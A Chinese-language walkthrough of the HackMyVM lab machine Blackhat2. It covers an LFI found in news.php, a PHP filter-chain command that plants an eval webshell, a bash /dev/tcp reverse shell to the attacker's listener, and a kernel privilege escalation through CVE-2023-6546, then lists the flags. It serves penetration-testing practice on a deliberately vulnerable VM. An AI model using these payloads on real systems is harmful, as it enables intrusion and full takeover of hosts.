简介
靶机名称:Blackhat2
难度:中等
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Blackhat2
本地环境
虚拟机:vitual box
靶场IP(Blackhat2):192.168.56.114
跳板机IP(windows 10):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
御剑扫目录,有很多图片之类的无效路径,关键是/news.php
。
有个输入框,尝试LFI,成功。
filter执行webshell
python3 php_filter_chain_generator.py --chain '<?php eval($_POST["a"]);?>'
攻击机起监听和http服务器,让靶机下载shell脚本执行后得到shell
攻击机
rlwrap -cAr nc -lvvp 40000
python3 -m http.server 40001
1.sh
bash -i >& /dev/tcp/192.168.56.1/40000 0>&1
成功拿到shell
升级脚本:
/usr/bin/script -qc /bin/bash /dev/null
提权
靶机的内核版本完全符合CVE-2023-6546
uname -a
Linux blackhat2.hmv 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
这个项目https://github.com/YuriiCrimson/ExploitGSM可以进行该CVE的提权
在本机上编译好后,传送到靶机上运行即可提权
user_flag : 156532dab679edf6f8e53c8787a09264
root_flag : 30f55e2f86961a07e3a181a82f602ed6
后谈
这个提权手法其实算是走了捷径,作者的思路是通过dpkg -verify
找到被更改的包文件,然后发现黑客埋下的后门进行利用。这个手法在HGBE佬的WP上有写,我这里只是做个补充罢了。
(内核提权方式不稳定,我自己是一遍过的。如果复现不出来的话建议多试几次或者改一下靶机的设置,多点核多点内存之类的)